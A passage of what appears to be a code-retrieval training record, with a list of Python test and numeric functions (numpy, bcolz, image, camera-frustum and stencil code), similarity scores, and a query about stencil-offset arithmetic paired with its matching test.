2.0, 2.0],\n [2.0, -8.88523461, 1.99072967, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 4.45995261, 9.40579439, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n ],\n [\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 6.43138915, 0.55102135, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, -3.37046541, -2.92035609, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n ],\n [\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, -8.41939397, 1.11828761, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n [\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, -6.68411074, -4.09524338, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n [2.0, 2.0, 2.0, 2.0],\n ],\n ],\n ]\n )\n obj.run(res=res, x=x, pad=pad, mode=mode, value=value, data_format=data_format)", "def test02(self):\n a = np.arange(1, 1e5) < 0\n b = bcolz.carray(a)\n wt = a.nonzero()[0].tolist()\n cwt = [i for i in b.wheretrue()]\n # print \"numpy ->\", a.nonzero()[0].tolist()\n # print \"where ->\", [i for i in b.wheretrue()]\n self.assertTrue(wt == cwt, \"wheretrue() does not work correctly\")", "def test_compute_pixel_rays() -> None:\n u = 12\n v = 2\n img_w = 20\n img_h = 10\n fx = 10\n fy = 10\n\n ray_dir = _compute_pixel_ray_direction(u, v, fx, fy, img_w, img_h)\n\n gt_ray_dir: NDArrayFloat = np.array([2.0, -3.0, 10.0])\n gt_ray_dir /= np.linalg.norm(gt_ray_dir)\n\n assert np.allclose(gt_ray_dir, ray_dir)", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def phantom_squares(n_points,S):\n \n #Rescaling according to image size \n S[:,0] = S[:,0]*n_points/2\n S[:,1] = S[:,1]*n_points/2\n S[:,2] = S[:,2]*n_points/2\n S[:,3] = S[:,3]*math.pi/180\n \n x,y = np.meshgrid(np.arange(0,n_points)-n_points//2 ,np.arange(0,n_points)-n_points//2 ) \n nrow,ncol = S.shape\n phantom1 = np.zeros((y.shape[0], y.shape[1], nrow)) \n\n for k in range(nrow): #itero sui quadrati\n x_new = x - S[k,0]\n y_new = y - S[k,1]\n\n u = abs(x_new*math.cos(S[k,3])+y_new*math.sin(S[k,3]))\n v = abs(-x_new*math.sin(S[k,3])+y_new*math.cos(S[k,3]))\n\n cond = np.maximum(u,v)\n\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n if (cond[i,j] < S[k,2]/2):\n phantom1[i,j,k] = S[k,4]; # gray scale\n else:\n phantom1[i,j,k] = 0.0;\n #endif\n #endfor\n #endfor\n #endfor\n\n phantom1 = phantom1.sum(axis=2)\n phantom = np.flipud(phantom1)\n return phantom", "def test_dxt5_colorblock_alpha_issue_4142():\n\n with Image.open(\"Tests/images/dxt5-colorblock-alpha-issue-4142.dds\") as im:\n px = im.getpixel((0, 0))\n assert px[0] != 0\n assert px[1] != 0\n assert px[2] != 0\n\n px = im.getpixel((1, 0))\n assert px[0] != 0\n assert px[1] != 0\n assert px[2] != 0", "def test01(self):\n a = np.arange(1, 11) < 0\n b = bcolz.carray(a)\n wt = a.nonzero()[0].tolist()\n cwt = [i for i in b.wheretrue()]\n # print \"numpy ->\", a.nonzero()[0].tolist()\n # print \"where ->\", [i for i in b.wheretrue()]\n self.assertTrue(wt == cwt, \"wheretrue() does not work correctly\")", "def shifts_projection(sc, clean):\n def shifts_projected(clean, axis):\n projected = clean.map(lambda x: x.mean(axis=axis)[:, :, np.newaxis])\n target = getTarget(projected, 30, 1)\n shifts = registerByPlane(sc, projected, target[:, :, np.newaxis], 10, False)\n return shifts[:, :, 0]\n\n # shifts_xy = shifts_projected(clean, 2)\n shifts_xz = shifts_projected(clean, 1)\n shifts_yz = shifts_projected(clean, 0)\n\n # x_shifts = np.mean(np.stack((shifts_xz[:, 0], shifts_xy[:, 0])), axis=0)\n z_shifts = np.mean(np.stack((shifts_xz[:, 1], shifts_yz[:, 1])), axis=0)\n # y_shifts = np.mean(np.stack((shifts_yz[:, 0], shifts_xy[:, 1])), axis=0)\n plt.figure()\n plt.plot(shifts_xz[:, 1])\n plt.plot(shifts_yz[:, 1])\n plt.plot(z_shifts)\n plt.title('Z')\n # plt.figure()\n # plt.plot(shifts_xz[:, 0])\n # plt.plot(shifts_xy[:, 0])\n # plt.plot(x_shifts)\n # plt.title('X')\n # plt.figure()\n # plt.plot(shifts_yz[:, 0])\n # plt.plot(shifts_xy[:, 1])\n # plt.plot(y_shifts)\n # plt.title('Y')\n # shifts_all = np.stack((x_shifts, y_shifts, z_shifts))\n\n def initReg(kv):\n from scipy.ndimage.interpolation import shift\n index, volume = kv\n current_shift = (0, 0, -1 * z_shifts[int(index[0])])\n shifted = shift(volume, current_shift)\n return shifted.astype(np.int16)\n\n reg = clean.map(initReg, with_keys=True, value_shape=clean.shape[1:], dtype=np.int16)\n reg.cache()\n reg.count()\n return reg", "def test_2d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(point):\n x, y = point\n return [x**2, y]\n \n a = func((1, 1))\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, [1**2, 1])\n \n a = func((2, 1))\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, [2**2, 1])\n \n a = func((1, 2))\n self.assertEqual(len(self.storage), 3)\n self.assertEqual(a, [1**2, 2])\n \n a = func((2, 2))\n self.assertEqual(len(self.storage), 4)\n self.assertEqual(a, [2**2, 2])\n \n a = func((1.5, 1.5))\n self.assertEqual(len(self.storage), 4)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def test_increment(self):\r\n self.p + 1\r\n self.assertEqual(str(self.p), '1% [....................]')\r\n self.p + 4\r\n self.assertEqual(str(self.p), '5% [#...................]')", "def test_prealloc_passthrough(op):\n x1 = np.arange(10)\n x2 = np.arange(10)\n scratch_space = np.zeros(x1.shape)\n _helper_prealloc_passthrough(op, x1, x2, scratch_space)", "def s_pos(self):\n running_total = 0\n for i in range(self.prob.num):\n if self.alphas[i] > 1e-5 > self.prob.C - self.deltas[i] and self.prob.Y[i] == 1:\n ayxx = 0\n for j in range(self.prob.num):\n ayxx += self.alphas[j] * self.prob.Y[j] * self.prob.xkernel(self.prob.X[j], self.prob.X[i])\n running_total += 1 - ayxx\n return running_total", "def test_add_op_jit():\n x = np.array([1, 2, 3, 4, 5, 6, 7])\n paddle_x = paddle.to_tensor(x).astype(\"float32\")\n paddle_x.stop_gradient = False\n print(paddle_x)\n a = 1\n b = 5\n out = custom_ops.slice_test(paddle_x, a, b)\n print(\"out: \", out)\n print(\"numpy out: \", x[a:b])\n assert np.allclose(out.numpy(), x[a:b])\n print(\"run success\")", "def test00(self):\n a = np.arange(1, 111)\n b = bcolz.carray(a)\n c = b[[3, 1]]\n r = a[[3, 1]]\n assert_array_equal(c, r, \"fancy indexing does not work correctly\")", "def test05(self):\n a = np.arange(1, 11) > 5\n b = bcolz.carray(a)\n wt = a.nonzero()[0].tolist()[2:]\n cwt = [i for i in b.wheretrue(skip=2)]\n # print \"numpy ->\", a.nonzero()[0].tolist()[2:]\n # print \"where ->\", [i for i in b.wheretrue(skip=2)]\n self.assertTrue(wt == cwt, \"wheretrue() does not work correctly\")", "def centered_stencil(self):\n\n # compute the shape of the new stencil\n shp = self.arr.shape\n shp = tuple(max(i, j-(i+1))*2 + 1 for i, j in zip(self.center, shp))\n # print(\"New Shape :\", shp)\n # generate the stencil in the right shape\n S = np.zeros(shp)\n # embed the stencil into the bigger stencil in order to place the center\n # into the center\n slc = []\n for c, shp_arr, shp_s in zip(self.center, self.arr.shape, shp):\n if c < shp_arr/2:\n slc.append(slice(shp_s - shp_arr, None))\n else:\n slc.append(slice(0, -(shp_s - shp_arr)))\n\n # print(slc)\n S[slc] = self.arr[:]\n # print(\"The Stencil\")\n # print(self.arr)\n # print(\"Centered stencil\")\n # print(S)\n return S", "def sample_func(sample_point):\r\n if sample_point[0] < 0 \\\r\n or sample_point[1] < 0 \\\r\n or sample_point[0] >= image.width \\\r\n or sample_point[1] >= image.height:\r\n return 0\r\n\r\n point_tuple = sample_point[0], sample_point[1]\r\n color = image.getpixel(point_tuple)\r\n if color[3] > 0:\r\n return 255\r\n else:\r\n return 0", "def __stars__(self):\n t_ops = self.__ops__[1::2]\n return t_ops.count('x') + t_ops.count('X')", "def test_adjacent_bomb_count(self):\n index = 0\n adj_list = utils.adjacent_bomb_count(index)\n adj_list_2 = [\n index + x\n for x in utils.LEFT_ADJ_LIST\n if 0 <= index + x <= (utils.TILE_COUNT - 1)\n ]\n self.assertEqual(adj_list, adj_list_2)", "def test_generate_frustum_planes_stereo() -> None:\n near_clip_dist = 3.56 # arbitrary value\n\n # Set \"focal_length_x_px_\"\n fx_px = 3666.534329132812\n\n # Set \"focal_length_y_px_\"\n fy_px = 3673.5030423482513\n\n # Set \"focal_center_x_px_\"\n cx_px = 1235.0158218941356\n\n # Set \"focal_center_y_px_\"\n cy_px = 1008.4536901420888\n\n camera_name = \"stereo_front_left\"\n height_px = 1550\n width_px = 2048\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx_px,\n fy_px=fy_px,\n cx_px=cx_px,\n cy_px=cy_px,\n height_px=height_px,\n width_px=width_px,\n cam_name=camera_name,\n )\n (\n left_plane,\n right_plane,\n near_plane,\n bottom_plane,\n top_plane,\n ) = pinhole_camera.frustum_planes(near_clip_dist)\n\n left_plane_expected: NDArrayFloat = np.array([fx_px, 0.0, width_px / 2.0, 0.0])\n right_plane_expected: NDArrayFloat = np.array([-fx_px, 0.0, width_px / 2.0, 0.0])\n near_plane_expected: NDArrayFloat = np.array([0.0, 0.0, 1.0, -near_clip_dist])\n bottom_plane_expected: NDArrayFloat = np.array([0.0, -fx_px, height_px / 2.0, 0.0])\n top_plane_expected: NDArrayFloat = np.array([0.0, fx_px, height_px / 2.0, 0.0])\n\n assert np.allclose(\n left_plane, left_plane_expected / np.linalg.norm(left_plane_expected)\n )\n assert np.allclose(\n right_plane, right_plane_expected / np.linalg.norm(right_plane_expected)\n )\n assert np.allclose(\n bottom_plane, bottom_plane_expected / np.linalg.norm(bottom_plane_expected)\n )\n assert np.allclose(\n top_plane, top_plane_expected / np.linalg.norm(top_plane_expected)\n )\n assert np.allclose(near_plane, near_plane_expected)" ]
[ "0.65050405", "0.54784226", "0.5474315", "0.5348384", "0.5347258", "0.5336783", "0.53343135", "0.53305495", "0.5314463", "0.52894896", "0.5283575", "0.5209135", "0.52068275", "0.5183291", "0.5156076", "0.5149829", "0.51383203", "0.51378614", "0.5116575", "0.51146805", "0.51082945", "0.5099656", "0.5092038", "0.5088668", "0.5084702", "0.5072374", "0.50645643", "0.5061528", "0.50502956", "0.5042427", "0.5034169", "0.50210094", "0.5002765", "0.49875385", "0.49859145", "0.49761724", "0.4971969", "0.49693465", "0.49691996", "0.4967546", "0.4965084", "0.49438098", "0.49350983", "0.4931023", "0.49299264", "0.4916141", "0.49120057", "0.49014682", "0.48948708", "0.48859465", "0.48735583", "0.48633936", "0.48567978", "0.48540846", "0.48412153", "0.48392224", "0.48296118", "0.48262948", "0.48000902", "0.47965497", "0.47948715", "0.4791709", "0.47852236", "0.47742406", "0.4773899", "0.47715682", "0.4765449", "0.47601563", "0.475863", "0.47546595", "0.47457623", "0.47377515", "0.47374162", "0.47350913", "0.47307986", "0.4727548", "0.4726233", "0.47205812", "0.47042418", "0.47039127", "0.4701436", "0.468695", "0.46859375", "0.46818143", "0.46772042", "0.46770996", "0.4667685", "0.4665822", "0.46654156", "0.46643534", "0.46599415", "0.46587986", "0.4658344", "0.46571508", "0.46565595", "0.46549633", "0.46525267", "0.4651183", "0.46509942", "0.46493447", "0.46487588" ]
0.0
-1
Test pointwise arithmetic with stencil offsets across two functions in indexed expression format
def test_indexed_stencil(self, expr, result): j, l = dimify('j l') a = symbol(name='a', dimensions=(j, l), value=0., mode='indexed').base fa = a.function b = symbol(name='b', dimensions=(j, l), value=2., mode='indexed').base fb = b.function eqn = eval(expr) Operator(eqn)(fa, fb) assert np.allclose(fa.data[1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1", "def position_op(x, wfunc):\n return x*wfunc", "def test_indexed_buffered(self, expr, result):\n i, j, l = dimify('i j l')\n a = symbol(name='a', dimensions=(i, j, l), value=2., mode='indexed').base\n fa = a.function\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def test_indexed_open_loops(self, expr, result):\n i, j, l = dimify('i j l')\n pushed = [d.size for d in [j, l]]\n j.size = None\n l.size = None\n a = DenseData(name='a', dimensions=(i, j, l), shape=(3, 5, 6)).indexed\n fa = a.function\n fa.data[0, :, :] = 2.\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)\n j.size, l.size = pushed", "def test_elemwise1():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32') + 0.5, 'a')\r\n b = tensor.fmatrix()\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, b ** a)], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, tensor.exp(b ** a))], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, a + b * tensor.exp(b ** a))],\r\n mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)", "def test_lifted_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n parcel_prof = parcel_profile(pressure, temperature[0], dewpoint[0])\n li = lifted_index(pressure, temperature, parcel_prof)\n assert_almost_equal(li, -7.9115691 * units.delta_degree_Celsius, 2)", "def test_flat(self, expr, result, mode):\n i, j = dimify('i j')\n a = symbol(name='a', dimensions=(i, j), value=2., mode=mode)\n b = symbol(name='b', dimensions=(i, j), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_var_idx_in_args(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"float array vars =\\n\\t0.5, 1\\n\\nMZgate(vars[0], vars[1]) | [0, 1]\"\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0.5, 1.0], 'kwargs': {}, 'modes': [0, 1]}\n ]", "def attest_ind (a, b, dimension=None, printit=0, name1='Samp1', name2='Samp2',writemode='a'):\r\n if dimension == None:\r\n a = N.ravel(a)\r\n b = N.ravel(b)\r\n dimension = 0\r\n x1 = amean(a,dimension)\r\n x2 = amean(b,dimension)\r\n v1 = avar(a,dimension)\r\n v2 = avar(b,dimension)\r\n n1 = a.shape[dimension]\r\n n2 = b.shape[dimension]\r\n df = n1+n2-2\r\n svar = ((n1-1)*v1+(n2-1)*v2) / float(df)\r\n zerodivproblem = N.equal(svar,0)\r\n svar = N.where(zerodivproblem,1,svar) # avoid zero-division in 1st place\r\n t = (x1-x2)/N.sqrt(svar*(1.0/n1 + 1.0/n2)) # N-D COMPUTATION HERE!!!!!!\r\n t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0\r\n probs = abetai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if type(t) == N.ndarray:\r\n probs = N.reshape(probs,t.shape)\r\n if probs.shape == (1,):\r\n probs = probs[0]\r\n \r\n if printit <> 0:\r\n if type(t) == N.ndarray:\r\n t = t[0]\r\n if type(probs) == N.ndarray:\r\n probs = probs[0]\r\n statname = 'Independent samples T-test.'\r\n outputpairedstats(printit,writemode,\r\n name1,n1,x1,v1,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n name2,n2,x2,v2,N.minimum.reduce(N.ravel(b)),\r\n N.maximum.reduce(N.ravel(b)),\r\n statname,t,probs)\r\n return\r\n return t, probs", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_grad_binary(func, motion, optimized, preserve_result, a, b):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, b)", "def test_coord_preceding_fs(self):", "def test_special_XYX(self, angexp):\n a, b, c, d = angexp[0]\n exp = {(\"rx\", \"ry\")[g]: angexp[1][g] for g in (0, 1) if angexp[1][g]}\n tgt = np.exp(1j * d) * RXGate(b).to_matrix() @ RYGate(a).to_matrix() @ RXGate(c).to_matrix()\n self.check_oneq_special_cases(tgt, \"XYX\", exp)", "def test_distance_indices(self):\n s1 = self.RNA(\"AUGC\")\n s2 = self.RNA(\"AAGC\")\n\n def f(x, y):\n if x == 2 or y == 2:\n return 10\n return 0\n\n self.assertEqual(s1.distance(s2, f, use_indices=True), 20)", "def test_directly_indexed_expression(self, fa, ti0, t0, exprs):\n eqs = EVAL(exprs, ti0.base, t0)\n op = Operator(eqs, dse='noop', dle='noop')\n trees = retrieve_iteration_tree(op)\n assert len(trees) == 2\n assert trees[0][-1].nodes[0].expr.rhs == eqs[0].rhs\n assert trees[1][-1].nodes[0].expr.rhs == eqs[1].rhs", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_operators_functions_unavailable_for_geography(self):\n z = Zipcode.objects.get(code=\"77002\")\n point_field = \"%s.%s::geometry\" % (\n connection.ops.quote_name(City._meta.db_table),\n connection.ops.quote_name(\"point\"),\n )\n # ST_Within.\n qs = City.objects.filter(point__within=z.poly)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"ST_Within({point_field}\", ctx.captured_queries[0][\"sql\"])\n # @ operator.\n qs = City.objects.filter(point__contained=z.poly)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"{point_field} @\", ctx.captured_queries[0][\"sql\"])\n # ~= operator.\n htown = City.objects.get(name=\"Houston\")\n qs = City.objects.filter(point__exact=htown.point)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"{point_field} ~=\", ctx.captured_queries[0][\"sql\"])", "def tes_mod(self):\r\n x, y = ints('xy')\r\n fn = gof.DualLinker().accept(FunctionGraph([x,y], [x%y])).make_function()\r\n for a,b in ((0,1), (1,1), (0,-1), (1,-1), (-1,-1),\r\n (1,2), (-1,2), (1,-2), (-1,-2),\r\n (5,3), (-5,3), (5,-3), (-5,-3)\r\n ):\r\n self.assertTrue(fn(a,b) == a%b, (a,))", "def test_verify():\n Lx = 10; Ly = 10; c = 1.0\n\n def I(x, y):\n return exp(-pow(x-Lx/2.0,2)/2.0 -pow(y-Ly/2.0,2)/2.0)\n def f(x, y, t):\n return sin(2*x) + y\n def bc(x, y, t):\n return sin(t)\n\n # use string formulas instead so also weave can be tested:\n # (need to transfer globals() so that vectorized versions work)\n I = StringFunction('exp(-pow(x-Lx/2.0,2)/2.0 - pow(y-Ly/2.0,2)/2.0)',\n independent_variables=('x', 'y'),\n Lx=Lx, Ly=Ly, globals=globals())\n f = StringFunction('sin(2*x) + y',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n bc = StringFunction('sin(t)',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n\n #nx = 15; ny = 10; tstop = 2\n nx = 4; ny = 3; tstop = 16\n verify_implementations(I, f, c, bc, Lx, Ly, nx, ny, tstop)", "def test_ex_2_5(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n program_reg_allocation = RegisterAllocation()\n program_instrs = compiler.compile_program(program, program_reg_allocation)\n\n wam = WAM()\n wam.execute(query_instrs)\n wam.execute(program_instrs)\n aW = 